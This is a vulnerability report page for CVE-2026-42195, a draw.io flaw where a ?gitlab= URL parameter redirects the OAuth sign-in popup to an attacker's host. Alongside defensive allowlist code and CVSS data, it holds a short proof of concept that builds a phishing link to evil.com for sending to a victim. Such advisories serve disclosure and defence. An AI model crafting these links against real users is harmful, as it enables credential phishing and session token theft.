Security Vulnerability Report
CVE-2026-42195 CVSS 3.4 LOW

Published: 2026-05-08 22:16:31
Last Modified: 2026-05-08 22:16:31

Description

draw.io is a configurable diagramming and whiteboarding application. Prior to version 29.7.9, the draw.io client accepts a ?gitlab= URL parameter that overrides the GitLab server URL used during OAuth sign-in. A crafted link causes the user's click on draw.io's "Authorize in GitLab" dialog to open a popup on the attacker-controlled host instead of gitlab.com. This can lead to credential phishing and session state token exfiltration. This issue has been patched in version 29.7.9.
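The defensive pattern for this class of bug is to never take an OAuth provider's base URL from a query parameter as-is: parse it, compare its origin (scheme, host, port) against a fixed allowlist, and fall back to the default provider otherwise. The JavaScript below is an added illustration of that check, not draw.io's code or its actual fix; the allowlist entries, the `attacker.example` host and the client/redirect values are constructed placeholders. GitLab's `/oauth/authorize` path is the real endpoint used here only to build the final URL.

```javascript
// Added example (not draw.io's own code): resolve the GitLab origin used for the
// OAuth popup from an allowlist, so a ?gitlab= value in a crafted link cannot
// redirect the "Authorize in GitLab" popup to an arbitrary host.

const DEFAULT_GITLAB_ORIGIN = "https://gitlab.com";

// Hypothetical allowlist: the public instance plus an assumed self-hosted one.
const ALLOWED_GITLAB_ORIGINS = new Set([
  "https://gitlab.com",
  "https://gitlab.example.internal", // constructed placeholder for a self-hosted instance
]);

// Returns the origin to use for the OAuth popup. Anything absent, unparseable,
// non-https or not on the allowlist falls back to the default origin.
function resolveGitlabOrigin(searchString) {
  const params = new URLSearchParams(searchString);
  const requested = params.get("gitlab");
  if (requested === null || requested === "") {
    return { origin: DEFAULT_GITLAB_ORIGIN, overridden: false, reason: "no parameter" };
  }
  let parsed;
  try {
    parsed = new URL(requested);
  } catch (e) {
    return { origin: DEFAULT_GITLAB_ORIGIN, overridden: false, reason: "unparseable" };
  }
  if (parsed.protocol !== "https:") {
    return { origin: DEFAULT_GITLAB_ORIGIN, overridden: false, reason: "not https" };
  }
  // Compare the parsed origin, never the raw string: "https://gitlab.com.attacker.example"
  // and "https://gitlab.com@attacker.example" both resolve to a different origin.
  if (!ALLOWED_GITLAB_ORIGINS.has(parsed.origin)) {
    return { origin: DEFAULT_GITLAB_ORIGIN, overridden: false, reason: "origin not allowlisted" };
  }
  return { origin: parsed.origin, overridden: true, reason: "allowlisted" };
}

// Builds the authorization URL from the vetted origin only. `state` is the opaque
// per-request nonce the caller stores and later compares on the callback; because
// the origin is vetted first, the nonce is never sent to an unvetted host.
function buildAuthorizeUrl(searchString, clientId, redirectUri, state) {
  const { origin } = resolveGitlabOrigin(searchString);
  const u = new URL("/oauth/authorize", origin);
  u.searchParams.set("client_id", clientId);
  u.searchParams.set("redirect_uri", redirectUri);
  u.searchParams.set("response_type", "code");
  u.searchParams.set("state", state);
  return u.toString();
}

// Constructed sample: the kind of query string a crafted link would carry.
const sampleQuery = "?gitlab=" + encodeURIComponent("https://attacker.example/fake-gitlab");
console.log(resolveGitlabOrigin(sampleQuery));
console.log(buildAuthorizeUrl(sampleQuery, "client-id-placeholder", "https://app.example/oauth/cb", "nonce-placeholder"));
```

The important detail is the comparison on `parsed.origin` rather than on a prefix or substring of the raw value; prefix checks are what host-confusion forms like `gitlab.com.attacker.example` and `gitlab.com@attacker.example` are designed to pass.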

CVSS Details

CVSS Score: 3.4
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

draw.io < 29.7.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// Proof of Concept: Malicious URL generation
// The 'gitlab' parameter overrides the OAuth endpoint
const targetUrl = "https://app.diagrams.net/";
const attackerControlledHost = "https://evil.com/fake-gitlab";
// Construct the malicious link
const pocLink = `${targetUrl}?gitlab=${encodeURIComponent(attackerControlledHost)}`;
console.log("Send the following link to the victim:");
console.log(pocLink);
// When the victim clicks 'Authorize in GitLab', the popup will point to evil.com

References

https://github.com/jgraph/drawio/issues/493
https://github.com/jgraph/drawio/releases/tag/v29.7.9
https://github.com/jgraph/drawio/security/advisories/GHSA-8x7j-m8px-7p8x

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42195", "sourceIdentifier": "[email protected]", "published": "2026-05-08T22:16:31.410", "lastModified": "2026-05-08T22:16:31.410", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "draw.io is a configurable diagramming and whiteboarding application. Prior to version 29.7.9, the draw.io client accepts a ?gitlab= URL parameter that overrides the GitLab server URL used during OAuth sign-in. A crafted link causes the user's click on draw.io's \"Authorize in GitLab\" dialog to open a popup on the attacker-controlled host instead of gitlab.com. This can lead to credential fishing and session state token exfiltration. This issue has been patched in version 29.7.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 3.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://github.com/jgraph/drawio/issues/493", "source": "[email protected]"}, {"url": "https://github.com/jgraph/drawio/releases/tag/v29.7.9", "source": "[email protected]"}, {"url": "https://github.com/jgraph/drawio/security/advisories/GHSA-8x7j-m8px-7p8x", "source": "[email protected]"}]}}